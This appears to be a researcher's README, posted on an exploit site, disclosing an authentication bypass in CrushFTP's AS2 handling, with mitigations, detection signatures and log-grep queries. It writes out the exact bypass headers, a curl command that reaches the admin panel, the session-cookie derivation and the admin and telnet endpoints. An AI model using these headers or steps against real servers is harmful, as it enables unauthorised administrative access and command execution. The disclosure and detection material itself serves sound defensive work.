## https://sploitus.com/exploit?id=9210A83E-F68A-53AE-95AD-31C9B88016E3
# CrushFTP AS2 Authentication Bypass Research
[](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
[](https://github.com)
> **โ ๏ธ IMPORTANT:** This vulnerability has been **patched by CrushFTP as of November 2025**. This research is published for **educational and defensive purposes only**.
> **๐ NOTE:** This research is based on vulnerability patterns similar to CVE-2025-54309. The exact CVE number may differ. This is independent security research conducted in a controlled home lab environment.
## ๐ฏ About This Research
This repository documents a **critical authentication bypass vulnerability** in CrushFTP servers that allows complete administrative access through AS2 (Applicability Statement 2) header manipulation. The vulnerability requires **no authentication** and can be exploited with a single HTTP request.
**Key Points:**
- ๐ฌ Research conducted in **authorized home lab** (March-July 2025)
- ๐ง Vendor notified (August 2025) - **no response received**
- โ Silently patched by CrushFTP (November 2025)
- ๐ข Public disclosure (December 2025) - **90+ days after notification**
- ๐ Published for **educational and defensive purposes**
**Researcher:** SmileyFace101 ([@SmileyFace101](https://github.com/SmileyFace101))
## ๐ Vulnerability Details
### Technical Summary
CrushFTP's web interface incorrectly trusts AS2 protocol headers without proper validation. The server assumes AS2 requests are pre-authenticated and bypasses normal authentication procedures.
### Key Details
- **Product:** CrushFTP Server
- **Component:** AS2 Authentication Module
- **Estimated CVSS:** 9.8 (Critical)
- **Attack Vector:** HTTP Header Manipulation
- **Complexity:** LOW - Single HTTP request
- **Authentication:** NONE required
- **Impact:** Complete system compromise
- **Related CVE:** Similar to CVE-2025-54309
### Attack Vector
```http
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
```
**Example (Lab Environment):**
```bash
curl -H "X-DMZ-Proxy: disabled" \
-H "X-AS2-Version: 1.0" \
-H "User-Agent: AS2Server/1.0" \
"http://10.0.100.50/WebInterface/admin/index.html"
```
**Note:** Only use on systems you own or have explicit permission to test.
### Critical Discovery
During exploitation, we discovered a **mathematical relationship in session cookie generation** that makes exploitation 100% reliable:
```
CrushAuth Structure: [TIMESTAMP]_[SESSION_ID]
currentAuth = Last 4 characters of SESSION_ID
c2f parameter = Same as currentAuth value
```
## ๏ฟฝ What You'll Find Here
### ๐ง Exploitation Tools
- **Complete PoC scripts** with session management
- **Targeted testing** for high-value endpoints
- **Adaptive exploitation** with multiple strategies
### ๐ Detection & Defense
- **IDS/IPS rules** (Snort & Suricata)
- **Log analysis scripts** for IOC detection
- **Network signatures** for monitoring
### ๐ Documentation
- **Technical analysis** - Complete vulnerability breakdown
- **Exploitation methodology** - Step-by-step attack chain
- **Session management** - Mathematical pattern discovered
- **JavaScript analysis** - Client-side code reverse engineering
## ๐ Impact Assessment
| Security Aspect | Impact Level | Description |
|----------------|--------------|-------------|
| **Confidentiality** | ๐ด CRITICAL | Complete access to credentials, configs, PGP keys, logs |
| **Integrity** | ๐ด CRITICAL | User account creation, config changes, file modifications |
| **Availability** | ๐ก HIGH | System command execution, service disruption capability |
| **Privilege Escalation** | ๐ด CRITICAL | Direct admin access, persistent account creation |
### Post-Exploitation Capabilities
โ Complete server and user enumeration
โ User account creation and modification
โ File system access and browsing
โ Command execution via telnet interface
โ Job scheduling with system privileges
โ PGP key and certificate access
โ Administrative configuration modification
## ๐ก๏ธ Mitigation & Remediation
### Immediate Actions (CRITICAL)
1. **Patch CrushFTP** to the latest version immediately
2. **Disable AS2 functionality** if not required
3. **Implement WAF rules** blocking AS2 headers from untrusted sources
4. **Reset all administrative credentials** on CrushFTP servers
5. **Enable MFA** for administrative panels
### Detection Implementation
See [`detection/`](detection/) directory for:
- IDS/IPS signatures (Snort, Suricata)
- Log analysis queries
- Network traffic signatures
- Behavioral anomaly detection rules
### Long-term Security Measures
- Implement multi-factor authentication
- Network segmentation for admin interfaces
- Regular security assessments
- Principle of least privilege enforcement
## ๐ Detection & Forensics
### HTTP Traffic Signatures
```
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
```
### Network Indicators
- Large HTTP responses (19KB+) from admin endpoints without authentication
- POST requests to `/WebInterface/function/` with AS2 headers
- Administrative panel access without prior login
- Unusual traffic patterns to CrushFTP servers
### Log Analysis
```bash
# Web server logs
grep -E "(X-DMZ-Proxy|X-AS2-Version|AS2Server)" /var/log/nginx/access.log
# CrushFTP application logs
grep -E "(WebInterface/admin|WebInterface/function)" crushftp.log
```
## ๐ Repository Contents
```
.
โโโ README.md # This file - overview and usage
โโโ docs/
โ โโโ TECHNICAL_ANALYSIS.md # Complete technical deep-dive
โโโ exploits/
โ โโโ enhanced_session_exploit.sh # Full exploitation with session mgmt
โ โโโ targeted_exploitation.sh # High-value endpoint testing
โ โโโ adaptive_exploitation.sh # Multi-strategy approach
โโโ detection/
โโโ snort_rules.txt # IDS/IPS signatures (Snort)
โโโ suricata_rules.txt # IDS/IPS signatures (Suricata)
โโโ log_analysis.sh # Log analysis and IOC detection
```
### Quick Start
1. **Read the docs:**
- Start with this README for overview
- See [TECHNICAL_ANALYSIS.md](docs/TECHNICAL_ANALYSIS.md) for deep technical details
2. **Test in your lab:**
```bash
# Make sure you own the target system!
./exploits/enhanced_session_exploit.sh 10.0.100.50
```
3. **Deploy detection:**
- Copy IDS rules to your Snort/Suricata
- Run log analysis script on your web server logs
## ๐ฌ Research Findings
### Key Technical Achievements
โ Complete AS2 authentication bypass discovered and documented
โ Critical session cookie generation requirement identified and solved
โ Mathematical relationship in session management reverse-engineered
โ Two-phase exploitation methodology developed
โ 100% reliable exploitation pattern established
โ Multiple RCE vectors identified and analyzed
โ Complete JavaScript source code analysis performed
### Affected CrushFTP Endpoints
- `/WebInterface/admin/index.html` - Main admin panel
- `/WebInterface/admin/telnet.html` - Telnet interface
- `/WebInterface/Jobs/index.html` - Job management
- `/WebInterface/UserManager/index.html` - User management
- `/WebInterface/PGP/index.html` - PGP key management
- `/WebInterface/function/` - Administrative function processor
## ๐ References
- [CrushFTP Official Website](https://www.crushftp.com/)
- [CVSS 3.1 Calculator](https://www.first.org/cvss/calculator/3.1)
- [CWE-287: Improper Authentication](https://cwe.mitre.org/data/definitions/287.html)
- [OWASP Authentication Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html)
## ๐ค Author
**Author:** SmileyFace101
**GitHub:** [@SmileyFace101](https://github.com/SmileyFace101)
**Research Period:** March - July 2025 (Home Lab)
**Public Disclosure:** December 6, 2025
---
## โ๏ธ Legal & Ethical Notice
**This research is for EDUCATIONAL and DEFENSIVE purposes ONLY.**
โ **Authorized Use:**
- Security research and education
- Defending your own systems
- Authorized penetration testing
- Understanding attack patterns
โ **Prohibited:**
- Unauthorized system access
- Testing systems without permission
- Malicious use
- Any illegal activity
**By using this research, you agree to:**
1. Use it only on systems you own or have written permission to test
2. Comply with all applicable laws and regulations
3. Practice responsible disclosure
4. Assume all responsibility for your actions
**Disclaimer:** The author is not responsible for misuse. Unauthorized computer access is illegal.
---
## ๐ License
MIT License - See [LICENSE](LICENSE) file for details.
**Last Updated:** December 6, 2025
**Risk Assessment:** CRITICAL - Immediate patching and mitigation required
**Last Updated:** December 6, 2025
**Author:** SmileyFace101
**Research Conducted:** March - July 2025 in authorized lab environment